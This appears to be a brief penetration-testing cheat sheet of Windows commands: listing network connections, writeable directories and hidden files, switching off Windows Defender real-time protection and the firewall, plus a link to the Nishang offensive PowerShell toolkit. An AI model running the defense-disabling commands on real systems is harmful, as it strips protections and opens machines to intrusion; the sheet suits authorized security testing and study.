
Network connections
> netstat -ano

Search for writeable directories
> dir /a-r-d /s /b

Show files/dir and hidden
> dir -force

Windows Defender
> sc.exe config WinDefend start= disabled
> sc.exe stop WinDefend
> Set-MpPreference -DisableRealtimeMonitoring $true

Firewall
> Netsh Advfirewall show allprofiles
> NetSh Advfirewall set allprofiles state off


Useful tools/modules
Nishang : https://github.com/samratashok/nishang

Share:

About Us